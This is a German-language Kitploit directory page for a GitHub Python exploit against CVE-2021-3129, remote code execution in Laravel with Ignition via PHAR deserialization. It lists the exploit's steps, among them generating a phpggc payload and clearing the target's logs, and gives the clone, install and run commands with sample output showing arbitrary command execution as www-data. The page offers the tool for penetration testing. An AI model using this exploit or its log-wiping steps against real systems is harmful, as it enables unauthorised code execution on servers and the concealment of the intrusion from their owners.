Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-3129 — Python-Exploit für CVE-2021-3129, das die PHAR-Deserialisierung automatisiert, um beliebige Befehle auf verwundbaren Laravel-Ignition-Endpunkten auszuführen. | Kitploit
Tools/GitHubGitHub/0x0d3ad/cve-2021-3129
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHub0x0d3ad/cve-2021-3129

CVE-2021-3129

Python-Exploit für CVE-2021-3129, das die PHAR-Deserialisierung automatisiert, um beliebige Befehle auf verwundbaren Laravel-Ignition-Endpunkten auszuführen.

Repository anzeigen
101vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-3129 Laravel Ignition RCE Exploit

Dies ist ein Python-Exploit-Skript für CVE-2021-3129, eine Remote-Code-Ausführungsschwachstelle in Laravel, wenn das Ignition-Paket installiert ist. Diese Schwachstelle ermöglicht es einem Angreifer, beliebige Systembefehle mittels PHAR-Deserialisierung auszuführen.

Funktionen

  • Generiert automatisch die PHAR-Nutzlast mit phpggc
  • Akzeptiert Benutzereingaben für einen beliebigen auszuführenden Befehl (z. B. id, whoami, usw.)
  • Automatisiert den gesamten Exploit-Prozess, einschließlich Löschen der Logs, Einfügen der Nutzlast, Konvertieren der Logs in PHAR und Auslösen der Deserialisierung

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek
  • PHP auf Ihrem System installiert
  • phpggc installiert (zum Generieren von PHAR-Nutzlasten)

Installation

  1. Klonen Sie das Repository:

    root@kitploit:~
    git clone https://github.com/0x0d3ad/CVE-2021-3129.git
    cd CVE-2021-3129
    
  2. Installieren Sie die erforderlichen Python-Pakete:

    root@kitploit:~
    pip install requests
    
  3. Führen Sie das Skript mit dem gewünschten Ziel und Befehl aus:

    root@kitploit:~
    python3 CVE-2021-3129.py http://example.com --cmd 'id'
    

    Beispielausgabe:

    root@kitploit:~
    [+] Generating PHAR payload for command: id
    [+] Trying to clear logs
    [+] Logs cleared
    [+] Convert log file to PHAR
    [+] Successfully converted logs to PHAR
    [+] PHAR deserialized
    ---------------------------------------
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    ---------------------------------------
    [+] Trying to clear logs
    [+] Logs cleared
    

Argumente

  • target (erforderlich): Die URL der anfälligen Laravel-Anwendung.
  • --cmd (optional): Der Befehl, der auf dem Ziel ausgeführt werden soll (Standard: whoami).
  • --log_path (optional): Der zu verwendende Log-Dateipfad (Standard: ../storage/logs/laravel.log).

POC

POC

POC

Tool herunterladen